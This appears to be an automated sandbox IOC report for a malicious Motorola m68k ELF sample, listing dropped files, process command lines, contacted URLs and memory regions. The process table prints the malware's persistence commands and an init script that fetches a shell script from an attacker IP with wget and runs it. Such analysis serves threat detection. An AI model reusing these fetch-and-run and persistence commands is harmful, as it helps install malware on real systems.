IOC Report
m68k.nn.elf


Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| m68k.nn.elf | ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped | initial sample | malicious |
| /etc/init.d/m68k.nn.elf | POSIX shell script, ASCII text executable | dropped | malicious |
| /etc/init.d/system | POSIX shell script, ASCII text executable | dropped | malicious |
| /etc/profile | ASCII text | dropped | malicious |
| /etc/rc.local | POSIX shell script, ASCII text executable | dropped | malicious |
| /boot/bootcmd | ASCII text | dropped | |
| /etc/inittab | ASCII text | dropped | |
| /etc/motd | ASCII text | dropped | |
| /etc/systemd/system/custom.service | ASCII text | dropped | |
| /memfd:snapd-env-generator (deleted) | ASCII text | dropped | |
| /tmp/qemu-open.Fr6rHn (deleted) | ASCII text, with no line terminators | dropped | |

Processes

| Path | Cmdline | Malicious |
|---|---|---|
| /tmp/m68k.nn.elf | /tmp/m68k.nn.elf | |
| /tmp/m68k.nn.elf | - | |
| /bin/sh | sh -c "systemctl enable custom.service >/dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/systemctl | systemctl enable custom.service | |
| /tmp/m68k.nn.elf | - | |
| /bin/sh | sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/chmod | chmod +x /etc/init.d/system | |
| /tmp/m68k.nn.elf | - | |
| /bin/sh | sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/ln | ln -s /etc/init.d/system /etc/rcS.d/S99system | |
| /tmp/m68k.nn.elf | - | |
| /bin/sh | sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf" | |
| /tmp/m68k.nn.elf | - | |
| /bin/sh | sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/chmod | chmod +x /etc/init.d/m68k.nn.elf | |
| /tmp/m68k.nn.elf | - | |
| /bin/sh | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/mkdir | mkdir -p /etc/rc.d | |
| /tmp/m68k.nn.elf | - | |
| /bin/sh | sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/ln | ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf | |
| /usr/lib/udisks2/udisksd | - | |
| /usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | |
| /usr/lib/systemd/systemd | - | |
| /usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator | |
| /usr/lib/udisks2/udisksd | - | |
| /usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | |

23 additional processes are not shown in this report.

URLs

| Name | IP | Malicious |
|---|---|---|
| http://94.156.227.233/curl.sh | unknown | |
| http://94.156.227.233/lol.sh | unknown | |
| http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s | unknown | |
| http://94.156.227.233/ | unknown | |

Domains

| Name | IP | Malicious |
|---|---|---|
| daisy.ubuntu.com | 162.213.35.24 | |

Memdumps

| Base Address | Regiontype | Protect | Malicious |
|---|---|---|---|
| 7fbf0c01c000 | | page execute read | malicious |
| 7fbf0c01f000 | | page read and write | |
| 7fbf8c021000 | | page read and write | |
| 7ffe5a700000 | | page execute read | |
| 7fbf91929000 | | page read and write | |
| 7fbf92c2c000 | | page read and write | |
| 562b7ba81000 | | page execute and read and write | |
| 7ffe5a632000 | | page read and write | |
| 562b7cfb5000 | | page read and write | |
| 7fbf9213a000 | | page read and write | |
| 7fbf92afb000 | | page read and write | |
| 7fbf9212c000 | | page read and write | |
| 7fbf8c000000 | | page read and write | |
| 7fbf9278b000 | | page read and write | |
| 7fbf927b0000 | | page read and write | |
| 562b79849000 | | page execute read | |
| 7fbf0c024000 | | page read and write | |
| 7fbf92c24000 | | page read and write | |
| 562b7bb18000 | | page read and write | |
| 562b79a7b000 | | page read and write | |
| 7fbf923c9000 | | page read and write | |
| 562b79a83000 | | page read and write | |
| 7fbf92c71000 | | page read and write | |

13 additional memdumps are not shown in this report.